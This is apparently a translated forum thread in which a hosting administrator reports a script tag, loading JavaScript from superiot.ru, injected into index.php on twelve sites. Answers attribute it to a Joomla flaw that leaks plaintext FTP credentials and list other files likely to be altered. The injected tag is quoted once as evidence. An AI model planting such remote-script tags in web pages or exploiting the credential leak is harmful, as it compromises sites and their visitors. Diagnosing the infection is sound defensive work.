我管理着几十个网站的托管。大约一周以来,我在 12 个不同的网站的文件中发现了此代码index.php:
<script type="text/javascript" src="http://superiot.ru/**.js"></script> // The name of the actual javascript file differs
<!-- some hash here-->
有些网站位于不同的服务器上,有些则不是。我只是想知道是否还有其他人也遇到了这种情况。
编辑更多信息:
- 所有服务器都是centOS 5.3
- PHP 版本为 5.2.9 或 5.2.4
- Apache 版本为 2.2.3 或 1.3.39
答案1
您是否在每个相关网站上使用相同的软件?
看起来要么是 CMS 插件被污染了,要么是您的网站吸引了一些不良关注。
答案2
该 javascript 是通过 FTP 漏洞添加的。如果我没记错的话,它通过 Joomla 中的一个漏洞找到 FTP 帐户数据,从而暴露 Joomla 如此优雅地以明文形式存储的 FTP 层用户/密码。
您将找到任何索引。, 默认。, home.* 可能会受到影响。另外,要特别注意本地维护的 jquery.js,它可以修改它以将代码添加到底部。